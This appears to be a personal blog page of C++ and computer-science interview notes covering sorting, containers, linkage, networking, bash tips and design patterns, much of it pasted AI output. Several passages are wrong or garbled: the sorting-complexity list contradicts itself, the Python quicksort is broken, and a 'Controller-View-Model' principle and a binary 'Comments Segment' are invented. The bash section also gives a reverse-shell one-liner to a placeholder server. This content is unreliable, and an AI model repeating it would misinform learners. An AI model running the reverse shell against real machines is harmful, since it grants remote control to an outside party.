            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000


  1. Single Responsibility Principle (SRP): A class should have only one reason to change.

  2. Open-Closed Principle (OCP): Software entities should be open for extension, but closed for modification.

  3. Liskov Substitution Principle (LSP): Subtypes should be replaceable with their base types without altering the correctness of the program.

  4. Interface Segregation Principle (ISP): Clients should not be forced to depend on methods they do not use.

  5. Dependency Inversion Principle (DIP): High-level modules should not depend on low-level modules. Both should depend on abstractions.

  6. Principle of Least Knowledge (PLK): A class should only have knowledge about its immediate relationships, not about the internal workings of its collaborators.

  7. Composition over Inheritance: Favor composition and delegation over inheritance to achieve code reuse and flexibility.

  8. Don’t Repeat Yourself (DRY): Avoid duplicating code and instead use abstraction and encapsulation to reduce repetition.

  9. Keep It Simple, Stupid (KISS): Simplicity is key to maintainable and understandable code.

  10. Separation of Concerns (SoC): Divide code into distinct concerns to improve maintainability and modularity.


Less common but another set of principles to consider.

  1. Information Expert: Assign responsibilities to the class that has the most information needed to fulfill them.

  2. Creator: Assign responsibilities that create or initialize objects to the class that contains the necessary data.

  3. Controller: Assign responsibilities for handling user input and coordination of tasks to a separate controller class.

  4. Low Coupling: Reduce dependencies between classes by assigning responsibilities to the class with the least number of connections to others.

  5. High Cohesion: Assign responsibilities so that the functions and data within a class are closely related and focused on a single purpose.

  6. Polymorphism: Design classes and methods to be able to handle different types of input and produce different types of output.

  7. Protected Variations: Design classes and methods to be easily adaptable and protect against potential changes in requirements or external factors.

  8. Indirection: Use an intermediate class or interface to decouple two classes and allow for future changes without affecting the other.

  9. Pure Fabrication: Assign responsibilities to classes that do not represent real-world concepts but are necessary to fulfill system requirements.

  10. Controller-View-Model (CVM): Use a CVM design pattern to separate user interface, domain logic, and data manipulation responsibilities into distinct layers.


The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.


Quicksort is the poster boy of sorting algorithms.

Quicksort is a sorting algorithm that follows the divide and conquer approach. It is one of the most popular sorting algorithms due to its efficiency and versatility. The time complexity of quicksort depends on various factors such as the choice of pivot, the input data, and the implementation of the algorithm.

In the best case scenario, when the pivot is chosen as the middle element of the array and the input data is already sorted, the time complexity of quicksort is O(n*log n). This is because the array is divided into two equal parts at each step, resulting in a balanced partitioning.

In the worst case scenario, when the pivot is chosen as the smallest or largest element and the input data is in reverse sorted order, the time complexity of quicksort is O(n^2). This is because the array is divided into two unequal parts at each step, resulting in an unbalanced partitioning.

In the average case, the time complexity of quicksort is also O(n*log n). This is because, on average, the array is divided into two equal parts at each step, resulting in a balanced partitioning.

The space complexity of quicksort is O(log n) in the best and average case scenarios, and O(n) in the worst case scenario. This is because the algorithm requires additional space for the recursive calls and the stack size increases in the worst case scenario due to unbalanced partitioning.

Overall, quicksort has a time complexity of O(n*log n) in the best and average case scenarios, and O(n^2) in the worst case scenario. Its space complexity is O(log n) in the best and average case scenarios, and O(n) in the worst case scenario.

Below is a Python implementation just for fun. But how is it implemented in C++?

# Function to perform quicksort
def quicksort(arr):
    # Base case: If array is empty or contains only one element, return the array
    if len(arr) < 2:
        return arr
        # Select the pivot element as the first element in the array
        pivot = arr[0]
        # Create empty arrays for elements smaller and larger than the pivot
        smaller = []
        larger = []
        # Loop through the array, comparing each element to the pivot
        for i in range(1, len(arr)):
            # If element is smaller than pivot, add it to the smaller array
            if arr[i] < pivot:
            # If element is larger than pivot, add it to the larger array
        # Recursively call quicksort on the smaller and larger arrays
        return quicksort(smaller) + [pivot] + quicksort(larger)

# Example
my_array = [5, 2, 8, 1, 9, 3]
sorted_array = quicksort(my_array)

# Output: [1, 2, 3, 5, 8, 9]

std::sort uses Introsort

Introsort is a sorting algorithm that combines the efficiency of quicksort with the guaranteed worst-case performance of heapsort. It starts by using quicksort to sort the array and switches to heapsort if the recursion depth exceeds a certain limit. This helps to avoid the worst-case scenario of quicksort, which occurs when the pivot chosen is the smallest or largest element in the array. Once the array is sorted, it performs a final check to ensure that the elements are in the correct order.

Introsort is a hybrid sorting algorithm that utilizes both comparison-based and non-comparison-based techniques. It has an average time complexity of O(nlogn) and a worst-case time complexity of O(nlogn). This makes it more efficient than other popular sorting algorithms such as merge sort, which has a worst-case time complexity of O(nlogn).

Introsort also has a space complexity of O(logn) as it uses recursion during the quicksort phase. However, this can be improved by using an iterative approach instead of recursion.

Overall, Introsort is a highly efficient and versatile sorting algorithm that is commonly used in many programming languages and libraries. Its ability to handle large datasets and its guaranteed worst-case performance make it a popular choice for sorting.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.


Small array threshold

The threshold for switching to insertion sort varies for each compiler.


std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

Sorting algorithms are used to arrange a set of data elements in a specific order, such as numerical or alphabetical order. The complexity of a sorting algorithm refers to the amount of time and resources it takes to sort a given set of data. It is measured in terms of time complexity and space complexity. The time complexity refers to the number of operations the algorithm needs to perform, whereas the space complexity refers to the amount of memory required to run the algorithm. The following are the complexities of various sorting algorithms, from best to worst:

  1. Constant Time (O(1)) This is the best-case scenario for sorting algorithms, where the time and space complexity is constant, regardless of the size of the input data. This means that the algorithm takes the same amount of time and space to sort the data, regardless of how large or small the data set is. This is achieved by algorithms like Counting sort, which have a predefined number of operations and do not depend on the input data.

  2. Linear Time (O(n)) This complexity means that the time and space required to sort the data is directly proportional to the size of the input data. As the data size increases, the time and space required also increase in a linear fashion. Algorithms like Bubble sort, Insertion sort, and Selection sort have a linear time complexity.

  3. Logarithmic Time (O(log n)) This complexity means that the time and space required to sort the data increases at a slower rate compared to the input data size. These algorithms divide the input data into smaller subproblems and solve them individually, resulting in a faster sorting process. Algorithms like Quick sort, Merge sort, and Heap sort have a logarithmic time complexity.

  4. Quadratic Time (O(n^2)) This complexity means that the time and space required to sort the data increase at a much faster rate compared to the input data size. These algorithms have nested loops, resulting in a slower sorting process. Algorithms like Bubble sort, Insertion sort, and Selection sort have a quadratic time complexity.

  5. Exponential Time (O(2^n)) This complexity means that the time and space required to sort the data increase exponentially with the input data size. These algorithms are highly inefficient and should be avoided for large datasets. Algorithms like Recursive Selection sort and Recursive Bubble sort have an exponential time complexity.

Overall, the best sorting algorithms have a time complexity of O(n) or O(log n), with constant space complexity. On the other hand, the worst sorting algorithms have a time complexity of O(n^2) or O(2^n), with space complexity increasing accordingly. It is important to consider the complexity of a sorting algorithm when choosing the most appropriate one for a given task.

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.


What are the most difficult concepts in computer science?

Virtual memory

OpenAI: _ 1. Increased Available Memory: Virtual memory allows the computer to use hard disk space as additional memory, thereby increasing the amount of available memory. This is especially beneficial for systems with limited physical memory.

  1. Efficient Memory Management: With virtual memory, the operating system can allocate memory to different programs as needed, without worrying about the availability of physical memory. This allows for efficient memory management and prevents programs from crashing due to insufficient memory.

  2. Ability to Run Large Programs: Virtual memory makes it possible to run large programs that require more memory than what is available on the computer. The operating system can swap in and out different parts of the program, allowing it to run seamlessly.

  3. Faster Performance: By using virtual memory, the operating system can keep frequently used data and instructions in physical memory, while less frequently used data is stored in secondary storage. This results in faster access times for frequently used data, leading to overall improved system performance.

  4. Multi-Tasking: With virtual memory, multiple programs can be run simultaneously, with each program having its own virtual memory space. This allows for efficient multi-tasking and prevents one program from interfering with the memory of another.

  5. Protection of System Memory: Virtual memory helps protect the system by isolating each program’s memory space. This prevents one program from accessing or corrupting the memory of another program, ensuring system stability and security.

  6. Flexibility: Virtual memory allows for flexibility in system configurations as it is not limited by the amount of physical memory available. This makes it easier to upgrade or expand the system without having to worry about memory limitations.

  7. Reduced Fragmentation: With virtual memory, the operating system can allocate memory in smaller chunks than the physical memory size. This reduces memory fragmentation and allows for more efficient use of physical memory.

  8. Lower Cost: Virtual memory reduces the need for expensive physical memory upgrades, as it allows the system to use hard disk space as additional memory. This makes it a cost-effective solution for systems with limited physical memory.

  9. Easy to Implement: Virtual memory is a built-in feature of most modern operating systems and does not require any additional hardware or software. This makes it easy to implement and use, without any significant changes to the system. __

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.

Hash functions

A hash function is a mathematical function that takes in an input and produces a fixed-size output called a hash or a digest. The output is typically a unique representation of the input, making it difficult to reverse the process and determine the original input. Hash functions are commonly used in cryptography to ensure data integrity and in data structures like hash tables for efficient storage and retrieval of data.

Properties of a hashing algorithm

String hashing

C++ standards

The big things for me are ranges and views, so effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once!

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might be available in 13.2 with -fmodules-fs flag).

Notable mentions from C++17 are structured bindings and execution policy.


See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.





Also see cppreference.


C++14 is an extension and improvement of C++11.


The C++ Standard Library containers

  1. Efficient and Optimized Implementation: The C++ Standard Library containers are designed and implemented by experts to ensure optimal performance and efficiency. They are highly optimized for memory usage and execution speed, making them ideal for high-performance applications.

  2. Portability: The containers are part of the C++ Standard Library, which means they are available on all platforms and can be used with any C++ compiler. This ensures that your code can be easily ported to different systems without any compatibility issues.

  3. Wide Range of Containers: The C++ Standard Library provides a wide range of containers, each with its own unique properties and advantages. This allows developers to choose the most suitable container for their specific application needs.

  4. Easy to Use: The containers are designed with intuitive interfaces and consistent syntax, making them easy to use and learn. This reduces the learning curve for developers and enables them to quickly start using the containers in their code.

  5. Memory Management: The containers take care of memory management, which means developers don’t have to worry about allocating and deallocating memory manually. This helps to prevent common memory-related errors such as memory leaks and dangling pointers.

  6. Type Safety: The containers are type-safe, which means they only allow objects of a specific type to be stored in them. This helps to prevent type-related errors and ensures that the data stored in the containers is always of the correct type.

  7. Standardized and Well-Tested: The C++ Standard Library containers are well-tested and have been used by countless developers for many years. This means they are reliable and conform to the C++ standard, ensuring consistent behavior across different implementations.

  8. Interoperability: The containers can be easily used in conjunction with other C++ Standard Library components, such as algorithms and iterators. This allows for the creation of powerful and efficient data structures and algorithms.

  9. Flexibility: The containers can be easily customized to suit the specific needs of an application. This includes modifying the underlying data structure, defining custom comparison functions, and providing custom allocators.

  10. Community Support: The C++ Standard Library containers are widely used and have a large community of developers who are familiar with them. This means there is a wealth of resources and support available for developers who are using these containers in their code.

  11. std::vector

  12. std::list

  13. std::deque

  14. std::set

  15. std::multiset

  16. std::map

  17. std::multimap

  18. std::unordered_set

  19. std::unordered_multiset

  20. std::unordered_map

  21. std::unordered_multimap

  22. std::stack

  23. std::queue

  24. std::priority_queue

  25. std::array

  26. std::forward_list

  27. std::bitset

  28. std::valarray (C++17)

  29. std::tuple (C++11)

  30. std::pair (C++11)

Categories of containers

Sequence containers refer to a group of data structures that store elements in a linear or sequential order. This means that the elements are stored in a specific order and can be accessed sequentially, starting from the first element. Examples of sequence containers include arrays, vectors, lists, and deques.

On the other hand, associative containers refer to a group of data structures that store elements in an associative manner. This means that the elements are stored in a way that allows them to be accessed using a specific key or value. Examples of associative containers include maps, sets, and hash tables.

One of the main differences between sequence and associative containers is the way they store and access elements. Sequence containers use indexes to access elements, while associative containers use keys or values. This means that accessing elements in a sequence container is faster, as it only requires knowing the index of the element, while accessing elements in an associative container may require searching for the key or value first.

Another difference is the flexibility of adding and removing elements. In sequence containers, elements can be easily added or removed from any position in the container, without affecting the order of the other elements. On the other hand, in associative containers, elements are usually added or removed based on the key or value, which may affect the order of the elements.

Additionally, sequence containers are better suited for storing and accessing large amounts of data, as they have a fixed size and consecutive memory allocation, allowing for efficient iteration. On the other hand, associative containers are better for storing and accessing smaller amounts of data, as they have a dynamic size and use more complex data structures, making iteration less efficient.

In summary, sequence containers are best used when the order of elements is important and efficient iteration is necessary, while associative containers are best used when quick access to elements based on keys or values is necessary.

Choosing a container

C++ linkage

Internal linkage refers to the visibility of a variable or function within a single translation unit (a source file and its included headers). It means that the variable or function can only be accessed within that translation unit and is not visible to other translation units in the program. This is achieved by using the static keyword before the variable or function declaration.

External linkage, on the other hand, refers to the visibility of a variable or function across multiple translation units in a program. It means that the variable or function can be accessed from any translation unit in the program. This is the default linkage for global variables and functions in C++. To declare a variable or function with external linkage, the extern keyword is used before the declaration.

In summary, internal linkage restricts the visibility of a variable or function to a single translation unit, while external linkage allows its visibility across multiple translation units. These concepts are important in managing the scope and accessibility of variables and functions in a C++ program.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.


If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;

Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Header: This is the first segment of a binary executable and contains information about the file, such as the file type, architecture, and entry point.

  2. Text Segment: Also known as the code segment, this segment contains the executable instructions that make up the program. This is where the main logic and operations of the program are stored.

  3. Data Segment: This segment contains initialized global and static variables used by the program. These variables have a fixed memory location and their values can be modified during program execution.

  4. BSS Segment: This segment contains uninitialized global and static variables. Unlike the data segment, the variables in this segment are initialized to zero by the operating system when the program is loaded.

  5. Stack Segment: This segment contains the program’s stack, which is used for local variables, function calls, and return addresses. It grows and shrinks dynamically as the program executes.

  6. Heap Segment: This segment contains dynamically allocated memory, which is used for variables that are created and destroyed during program execution. The size of this segment can change dynamically as the program allocates and frees memory.

  7. Dynamic Linking Segment: This segment contains information about the dynamic libraries that the program uses. These libraries are loaded at runtime and their functions can be called by the program.

  8. Relocation Segment: This segment contains information about the memory addresses that need to be modified if the program is loaded at a different memory location than the one it was compiled for.

  9. Symbol Table Segment: This segment contains a list of all the symbols used in the program, such as function names and global variables. This information is used by the linker to resolve external dependencies.

  10. Debugging Information Segment: This segment contains information used for debugging the program, such as line numbers and variable names.

  11. Comments Segment: This segment may contain any comments or documentation added by the programmer during the development process. This segment does not affect the execution of the program.


Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law is a fundamental principle in computer architecture that helps determine the potential speedup of a system by adding additional resources. It is named after computer architect Gene Amdahl, who first described it in 1967.

The law states that the overall performance improvement of a system is limited by the proportion of the system that cannot be parallelized. In other words, if a system has a portion of code that cannot be parallelized, then the overall speedup of the system will be limited by that portion, no matter how many additional resources are added.

Amdahl’s law can be mathematically represented as:

Speedup = 1 / (1 - P + P/N)

Where P is the proportion of the code that can be parallelized and N is the number of processors or resources added.

For example, if a system has a portion of code that takes up 20% of the total execution time and the remaining 80% can be parallelized, then the maximum speedup that can be achieved is 5x, regardless of how many processors are added.

This law highlights the importance of optimizing the non-parallelizable portion of a system in order to achieve the highest speedup possible. It also shows that adding more resources does not always result in a linear improvement in performance.

In summary, Amdahl’s law serves as a guideline for system designers to understand the trade-offs between adding more resources and optimizing the non-parallelizable portion of a system in order to achieve the best overall performance.

It’s very tempting to optimise the parts your are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.

Data structures

It’s important to know the common data structures and their characteristics.

  1. Array
  2. Linked List
  3. Stack
  4. Queue
  5. Binary Tree
  6. Binary Search Tree
  7. Heap
  8. Hash Table
  9. Graph
  10. Trie
  11. Priority Queue
  12. Set
  13. Dictionary/Map
  14. Tree
  15. Red-Black Tree
  16. B-Tree
  17. AVL Tree
  18. Fenwick Tree
  19. Segment Tree
  20. Disjoint Set Union (DSU)
  21. Bloom Filter
  22. Skip List
  23. Circular Buffer
  24. Double-ended Queue (Dequeue)
  25. Splay Tree
  26. Suffix Tree
  27. Bloomier Filter
  28. Radix Tree
  29. Fibonacci Heap
  30. K-D Tree


std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;

        const size_t id = x++;

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        std::cout << "-- capacity " << y.capacity() << " --\n";

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

Binary search trees are a popular data structure in computer science that are used to store and organize data in a hierarchical manner. They are based on the concept of a binary tree, which is a tree structure made up of nodes where each node has at most two child nodes (left and right).

In a binary search tree, the nodes are organized in a specific way that allows for efficient searching, insertion, and deletion operations. The left child of a node contains a value that is smaller than the value of the parent node, while the right child contains a value that is larger. This property is known as the "binary search property" and allows for faster searching by eliminating the need to search through all nodes in the tree.

Binary search trees are typically implemented using a linked data structure, where each node contains a value and references to its left and right child nodes. The tree is usually ordered from top to bottom, with the root node at the top and the leaf nodes at the bottom.

Some common operations on binary search trees include insert, delete, and search. These operations have a time complexity of O(log n), making binary search trees efficient for storing and retrieving data.

However, if the tree is not properly balanced, it can lead to a worst-case time complexity of O(n), making the operations much slower. To avoid this, various balancing techniques, such as AVL trees and red-black trees, are used to ensure the tree remains balanced and efficient.

Binary search trees are commonly used in applications that require fast searching, such as in databases and search engines. They are also used in implementing other data structures, such as binary heaps and priority queues.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.


A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.


Project down, the top of the tree is a smallest element.

   2       3
 4   5   6   7
8 9 a b c d e f
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is based on a complete binary tree, where each parent node is either greater than or equal to (max heap) or less than or equal to (min heap) its child nodes. This means that the root node of a max heap is always the largest element in the heap, and the root node of a min heap is always the smallest element. Heaps are typically used to implement priority queues.

On the other hand, a binary search tree (BST) is a data structure in which each node has at most two child nodes (left and right), and the key value in the left child is less than the key value in the parent, while the key value in the right child is greater than the key value in the parent. This allows for efficient searching, insertion, and deletion of elements in the tree.

In summary, the main differences between a heap and a binary search tree are: - Structure: A heap is a complete binary tree, while a binary search tree is a binary tree. - Ordering: In a heap, the parent node is either greater than or equal to its child nodes, while in a binary search tree, the left child is always smaller than the parent and the right child is always greater. - Usage: Heaps are commonly used to implement priority queues, while binary search trees are used for efficient searching, insertion, and deletion of elements. - Balancing: Heaps do not need to be balanced, while binary search trees need to be balanced to maintain their efficiency.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Average Case Complexity Worst Case Complexity
vector O(1) O(n)
list O(1) O(n)
deque O(1) O(n)
set O(log(n)) O(n)
multiset O(log(n)) O(n)
map O(log(n)) O(n)
multimap O(log(n)) O(n)
unordered_set O(1) O(n)
unordered_multiset O(1) O(n)
unordered_map O(1) O(n)
unordered_multimap O(1) O(n)
stack O(1) O(n)
queue O(1) O(n)
priority_queue O(log(n)) O(n)

Note: All complexities are in terms of the number of elements in the container.

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.

Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));


As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.


git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 80
echo hello > /dev/tcp/
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.




The three load average values are 1, 5 and 15 minutes.

15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51


Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -


“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer No. Name Function
7 Application Layer Provides network services to applications
6 Presentation Layer Handles data formatting and translation
5 Session Layer Manages communication sessions between devices
4 Transport Layer Ensures reliable data delivery and handles error correction
3 Network Layer Manages logical addressing and routing of data packets
2 Data Link Layer Handles physical addressing and error detection of data frames
1 Physical Layer Transmits raw data between devices and handles the physical connection

Three way handshake

The TCP three way handshake is a method used by devices to establish a reliable connection and ensure proper communication between them. It is a three-step process that takes place before any data is transmitted between the two devices.

  1. Step 1 - SYN: The first step in the three-way handshake is the synchronization (SYN) packet. The client sends a SYN packet to the server indicating its intention to establish a connection. This packet contains a randomly generated sequence number that is used to keep track of the data being transmitted.

  2. Step 2 - SYN-ACK: Upon receiving the SYN packet, the server sends a SYN-ACK packet back to the client. This packet acknowledges the client’s request and also contains a randomly generated sequence number. The server also increments the client’s sequence number by 1.

  3. Step 3 - ACK: Finally, the client sends an acknowledgment (ACK) packet to the server, confirming that it has received the SYN-ACK packet. The client also increments the server’s sequence number by 1. At this point, the connection is established, and both devices are ready to start transmitting data.

Once the three-way handshake is completed, a reliable connection is established between the two devices, and they can begin exchanging data packets. This method ensures that both devices are synchronized and ready to communicate before any data is transmitted, reducing the chances of data loss or errors during transmission. Additionally, the sequence numbers exchanged during the handshake help to keep track of the data being transmitted, allowing for efficient and accurate data transfer.

SYN stands for “synchronise”.

=> SYN
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
=> ACK

Design patterns

The objective of design patterns is to provide a set of proven and reusable solutions to commonly occurring design problems in software development. These patterns help developers to create well-structured, maintainable, and extensible code that can easily be adapted to changing requirements. By following established design patterns, developers can save time and effort in developing solutions to common problems, as these patterns have already been tested and proven to be effective. They also promote consistency and standardization in software design, making it easier for other developers to understand and maintain the code. Ultimately, the goal of design patterns is to improve the overall quality and efficiency of software development.


Common patterns

{ “id”: “cmpl-8wjvZOms02LICwMyxY4iZlk2ZtrGM”, “object”: “text_completion”, “created”: 1709010261, “model”: “gpt-3.5-turbo-instruct”, “choices”: [ { “text”: “?

  1. Singleton Pattern: Ensures that only one instance of a class is created and provides a global access point to that instance.

  2. Factory Pattern: Creates objects without exposing the instantiation logic to the client and refers to the newly created object through a common interface.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Decorator Pattern: Dynamically adds new functionality to an existing object without changing its structure.

  5. Adapter Pattern: Allows the interface of an existing class to be used as another interface.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to vary independently from clients that use it.

  7. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  8. Template Method Pattern: Defines the skeleton of an algorithm in a method, deferring some steps to subclasses.

  9. Proxy Pattern: Provides a surrogate or placeholder object to control access to another object.

  10. Command Pattern: Encapsulates a request as an object, thereby allowing for parameterization of clients with different requests, queueing or logging of requests, and support for undoable operations.

  11. State Pattern: Allows an object to alter its behavior when its internal state changes.

  12. Composite Pattern: Composes objects into tree structures to represent part-whole hierarchies. It lets clients treat individual objects and compositions of objects uniformly.

  13. Bridge Pattern: Separates an object’s interface from its implementation so that the two can vary independently.

  14. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It defines a higher-level interface that makes the subsystem easier to use.

  15. Flyweight Pattern: Uses sharing to support large numbers of fine-grained objects efficiently.

  16. Visitor Pattern: Defines a new operation to a class without changing the class itself.

  17. Chain of Responsibility Pattern: Allows a request to be passed through a chain of handlers until one of them handles the request.

  18. Interpreter Pattern: Defines a language and provides an interpreter for processing expressions in that language.

  19. Memento Pattern: Captures and externalizes an object’s internal state so that the object can be restored to this state later.

  20. Mediator Pattern: Defines an object that encapsulates how a set of objects interact. It promotes loose coupling by keeping objects from referring to each other explicitly, and it allows their interaction to vary independently. “,”index”: 0, “logprobs”: null, “finish_reason”: “stop” } ], “usage”: { “prompt_tokens”: 6, “completion_tokens”: 519, “total_tokens”: 525 } }

Factory pattern

The factory design pattern is a creational design pattern that allows for the creation of objects without having to specify the exact class of object that will be created. It is used to create objects that are similar in nature, but have different properties or behaviors.

The basic idea behind the factory design pattern is to have a central factory class that is responsible for creating and managing the creation of objects. This factory class contains a method or set of methods that take in some input parameters and return a new object based on those parameters.

There are two main types of factory design patterns: the simple factory and the abstract factory.

  1. Simple Factory: The simple factory pattern involves a single factory class that creates different types of objects based on a given set of parameters. This is the most basic form of the factory pattern and is useful when the creation of objects is straightforward and does not require complex logic.

